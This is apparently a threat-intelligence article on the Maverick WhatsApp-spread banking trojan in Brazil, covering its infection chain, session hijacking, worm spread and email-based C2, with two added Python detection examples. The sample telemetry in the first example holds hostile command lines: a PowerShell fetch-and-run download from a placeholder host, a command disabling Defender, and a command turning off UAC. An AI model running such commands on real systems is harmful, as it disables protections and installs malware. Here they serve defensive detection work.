A sophisticated banking malware campaign dubbed "Maverick" is spreading rapidly through WhatsApp, targeting Brazil's financial sector and hospitality industry with unprecedented success by exploiting the country's massive user base of 148 million WhatsApp subscribers. The malware, attributed to a threat actor group known as Water Saci, represents a significant evolution in banking trojans by combining browser session hijacking, self-propagating worm capabilities, and advanced evasion techniques designed to bypass enterprise security controls.
Cybersecurity researchers from CyberProof, Sophos, Kaspersky, and Trend Micro have identified striking similarities between Maverick and a previously known banking trojan called Coyote. Both malware strains are written in .NET, exclusively target Brazilian financial institutions and users, and share identical functionality for decrypting banking URLs, monitoring financial applications, and spreading through WhatsApp Web.
The relationship between Maverick and Coyote indicates either direct evolution from previous campaigns or coordinated operations within Brazil's cybercriminal ecosystem. Both malware variants demonstrate identical operational patterns and targeting preferences, suggesting either the same threat actor group or closely affiliated criminal networks sharing code repositories and operational intelligence.
This evolution marks a critical shift in banking trojan development: threat actors have transitioned from traditional phishing and credential harvesting to exploiting legitimate communication platforms and browser session manipulation for stealthier, more scalable attacks that bypass conventional security defenses.
The infection chain begins deceptively with a malicious ZIP archive delivered through WhatsApp messages. The archive contains a Windows shortcut (.LNK) file that, when executed by an unsuspecting user, initiates a sophisticated multi-stage PowerShell-based infection process.
Upon execution, the LNK file launches cmd.exe or PowerShell, which connects to an external server (zapgrande[.]com) and downloads the first-stage payload. This PowerShell script immediately disables Microsoft Defender Antivirus and User Account Control (UAC), removing critical Windows security barriers before the malware installation proceeds.
The malware then downloads a .NET loader with advanced anti-analysis capabilities. The loader checks for the presence of reverse-engineering tools and terminates itself if a debugging environment is detected, a technique designed to thwart analysis by security researchers and automated sandboxing systems.
Critically, the loader verifies the victim's geographic location by checking time zone, language, region, and date-time format settings. Maverick will only install on systems configured for Brazilian locales, indicating highly targeted operations focused exclusively on Brazilian territory.
Once installed, Maverick's primary objective is browser session hijacking. The malware downloads ChromeDriver and Selenium for browser automation, then uses VBScript (SORVEPOTEL component) and PowerShell to seize control of WhatsApp Web sessions without triggering security alerts.
The malware copies the victim's legitimate Chrome profile data (cookies, authentication tokens, and saved browser sessions) to a temporary workspace. With this data, Maverick bypasses WhatsApp Web's authentication mechanisms entirely, gaining immediate account access without QR code scanning or any additional verification.
With hijacked WhatsApp access, the malware automatically distributes malicious ZIP files to all contacts in the victim's address book. The PowerShell component iterates through harvested contacts, personalizes messages using time-based greetings and contact names, then sends the malicious archive to each target. This self-propagating worm mechanism exponentially amplifies infection rates by leveraging social trust relationships.
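The infection chain above (shortcut-launched script host downloading a payload, Defender and UAC tampering, then a script host driving ChromeDriver against a Chrome profile copied to a temporary folder) leaves a recognisable process-creation trail. The following is an added detection example written for this page; it is not code from the article or from the researchers it cites. It runs over constructed Sysmon-style process-creation events, and the field names, hosts, paths and sample command lines are assumptions for the example.

```python
"""Added detection example (not from the original article): flag the stages of the
Maverick infection chain in Sysmon-style process-creation events (constructed here)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # parent image basename, lower-case (assumed normalised upstream)
    image: str    # child image basename, lower-case
    cmdline: str  # command line as logged


SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# Download primitives commonly seen in first-stage PowerShell one-liners.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|start-bitstransfer", re.I)
# Defender real-time protection turned off, or exclusions added, via Set/Add-MpPreference.
DEFENDER_RE = re.compile(
    r"set-mppreference.*disablerealtimemonitoring|add-mppreference.*-exclusion", re.I)
# UAC policy value EnableLUA being set to 0 (reg.exe, Set-ItemProperty, etc.).
UAC_RE = re.compile(r"enablelua\b.*\b0\b", re.I)
# Chrome started against a profile directory under the user's Temp folder.
TEMP_PROFILE_RE = re.compile(r"--user-data-dir=\S*\\(appdata\\local\\)?temp\\", re.I)


def rule_shortcut_script_download(ev):
    # A .LNK opened from Explorer shows up as explorer.exe spawning cmd/powershell.
    return (ev.parent == "explorer.exe" and ev.image in SCRIPT_HOSTS
            and bool(DOWNLOAD_RE.search(ev.cmdline)))


def rule_defender_tampering(ev):
    return ev.image in SCRIPT_HOSTS and bool(DEFENDER_RE.search(ev.cmdline))


def rule_uac_disabled(ev):
    return ev.image in (SCRIPT_HOSTS | {"reg.exe"}) and bool(UAC_RE.search(ev.cmdline))


def rule_browser_automation_from_script(ev):
    # Either ChromeDriver launched by a script host, or Chrome opened by a script host /
    # ChromeDriver on a profile that lives in %TEMP% (the copied WhatsApp Web session).
    driver_from_script = ev.image == "chromedriver.exe" and ev.parent in SCRIPT_HOSTS
    chrome_on_temp_profile = (ev.image == "chrome.exe"
                              and ev.parent in (SCRIPT_HOSTS | {"chromedriver.exe"})
                              and bool(TEMP_PROFILE_RE.search(ev.cmdline)))
    return driver_from_script or chrome_on_temp_profile


RULES = [
    ("shortcut_script_download", rule_shortcut_script_download),
    ("defender_tampering", rule_defender_tampering),
    ("uac_disabled", rule_uac_disabled),
    ("browser_automation_from_script", rule_browser_automation_from_script),
]


def detect(events):
    """Return (rule_name, cmdline) for every rule that fires on every event, in order."""
    alerts = []
    for ev in events:
        for name, pred in RULES:
            if pred(ev):
                alerts.append((name, ev.cmdline))
    return alerts


# Constructed sample telemetry (hosts and paths are placeholders, not real indicators).
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe",
              "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('https://c2.example.invalid/stage1')\""),
    ProcEvent("powershell.exe", "powershell.exe",
              "powershell.exe -c Set-MpPreference -DisableRealtimeMonitoring $true"),
    ProcEvent("powershell.exe", "reg.exe",
              r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
              r" /v EnableLUA /t REG_DWORD /d 0 /f"),
    ProcEvent("powershell.exe", "chromedriver.exe", "chromedriver.exe --port=9515"),
    ProcEvent("chromedriver.exe", "chrome.exe",
              r"chrome.exe --user-data-dir=C:\Users\victim\AppData\Local\Temp\wa_profile"
              r" --no-first-run"),
    # Benign: an admin listing a directory from a shortcut-launched shell (no download).
    ProcEvent("explorer.exe", "powershell.exe", r"powershell.exe -c Get-ChildItem C:\Users"),
]

if __name__ == "__main__":
    for name, cmd in detect(SAMPLE_EVENTS):
        print(f"{name:32s} {cmd[:70]}")
```

Each rule on its own is noisy in some environments (administrators do run `reg add`, and test automation does spawn ChromeDriver); the value is in correlating several of them under one process tree within a short window, which is the shape of the chain described above.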
Maverick monitors active browser tabs for URLs matching a hard-coded list of Brazilian financial institutions. Upon detecting matching URLs, the malware contacts remote command-and-control servers to fetch phishing pages and credential-stealing templates.
The C2 infrastructure is unusual: commands are relayed through terra.com[.]br email accounts, accessed with hardcoded credentials and multi-factor authentication, rather than over HTTP. Replacing traditional HTTP-based C2 communications with IMAP email connections complicates detection by security monitoring systems that typically focus on network anomalies.
Supported C2 commands include comprehensive system surveillance capabilities: INFO collection, CMD execution, PowerShell command execution, screenshot capture, process enumeration, file operations, system configuration changes, and malware self-updating mechanisms.
Initial Maverick targeting focused exclusively on Brazilian financial institutions. However, CyberProof's analysis identified evidence of expansion to hospitality sector targets, suggesting threat actors are refining strategies to steal customer financial and booking data from hotels, airlines, and travel service providers.
This sector expansion indicates either increasing operational ambitions or specific intelligence-gathering objectives targeting high-value hospitality customers and their sensitive financial information.
Trend Micro documented Water Saci's deployment of remote management capabilities that allow real-time campaign control. Attackers can pause and resume WhatsApp propagation, monitor infection progress, and dynamically adjust operations across multiple endpoints, effectively turning compromised machines into coordinated botnet infrastructure.
The email-based C2 system, while operationally cumbersome due to MFA requirements, provides significant operational resilience. Traditional HTTP-based C2 infrastructure is easily disrupted through domain takedowns and IP blocking. Email-based communications distribute command infrastructure across legitimate email providers, complicating enforcement and enabling rapid fallback to alternative email accounts.
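Because the C2 channel described above rides on legitimate email providers, domain takedowns do little; what a defender can still observe is which process on the endpoint is speaking IMAP, to whom, and how regularly. The following is an added example written for this page, not code from the article or the vendors it cites: a small analytic over constructed outbound-connection records that flags mail-port connections from processes that are not known mail clients and reports whether those connections recur at regular intervals, a beaconing hint. Process names, hosts, timestamps and thresholds are assumptions for the example.

```python
"""Added example (not from the original article): spot non-mail-client processes using
IMAP/SMTP ports, and note whether their connections look periodic (beacon-like)."""
from collections import defaultdict
from dataclasses import dataclass
from statistics import fmean, pstdev


@dataclass(frozen=True)
class Conn:
    ts: float     # epoch seconds of the connection
    image: str    # process image basename, lower-case
    dest: str     # destination host
    port: int     # destination port


MAIL_PORTS = {25, 143, 465, 587, 993}
# Processes expected to speak IMAP/SMTP on a workstation; tune per environment (assumed).
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}


@dataclass(frozen=True)
class Finding:
    image: str
    dest: str
    count: int
    periodic: bool


def is_periodic(timestamps, min_count=3, max_cv=0.2):
    """True when the gaps between connections are nearly constant.

    Uses the coefficient of variation (std/mean) of the inter-connection gaps; a
    polling loop with a fixed sleep gives a value close to 0, human activity does not.
    """
    if len(timestamps) < min_count:
        return False
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    mean = fmean(gaps)
    if mean <= 0:
        return False
    return pstdev(gaps) / mean <= max_cv


def find_mail_c2(conns):
    """Group mail-port connections by (image, dest) and report every non-mail-client pair."""
    by_pair = defaultdict(list)
    for c in conns:
        if c.port in MAIL_PORTS and c.image not in MAIL_CLIENTS:
            by_pair[(c.image, c.dest)].append(c.ts)
    return [Finding(img, dest, len(ts), is_periodic(ts))
            for (img, dest), ts in sorted(by_pair.items())]


# Constructed sample records (hosts are placeholders, not real indicators).
SAMPLE_CONNS = [
    # The corporate mail client: allow-listed, so never reported.
    *(Conn(t, "outlook.exe", "imap.corp-mail.invalid", 993) for t in (0, 305, 612)),
    # An unsigned binary in a user-writable path polling a mailbox every 60 s.
    *(Conn(t, "updater.exe", "imap.mail-provider.invalid", 993)
      for t in (10, 70, 130, 190, 250)),
    # A single IMAP connection straight from PowerShell.
    Conn(400, "powershell.exe", "imap.mail-provider.invalid", 993),
    # Ordinary HTTPS traffic, ignored.
    Conn(420, "chrome.exe", "www.example.invalid", 443),
]

if __name__ == "__main__":
    for f in find_mail_c2(SAMPLE_CONNS):
        print(f"{f.image:16s} -> {f.dest:28s} n={f.count} periodic={f.periodic}")
```

The allow-list is the weak point of this check: a malicious process can be named to blend in, so in practice the image path and signer should be part of the key, and the periodicity score is what separates a polling C2 loop from an occasional legitimate script that sends a report by email.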
Brazil's position as the second-largest WhatsApp market globally, after India, creates an unprecedented attack surface. The platform's status as the primary communication channel for 148 million users makes it ideal for social engineering and self-propagating malware distribution.
Additionally, Brazilian banking infrastructure is an attractive target because of its large customer base, substantial account balances, and varying security maturity across institutions and users.
Users should avoid opening ZIP file attachments from unknown WhatsApp contacts, enable two-factor authentication on all banking and critical accounts, maintain current antivirus software, and immediately report suspicious activity to banks and cybercrime authorities. Organizations should implement endpoint detection and response systems, disable dangerous scripting languages where possible, and conduct targeted security awareness training addressing WhatsApp-based threats.
The Maverick campaign demonstrates how cybercriminals systematically exploit communication platform popularity and legitimate browser infrastructure to conduct large-scale, self-propagating financial fraud campaigns.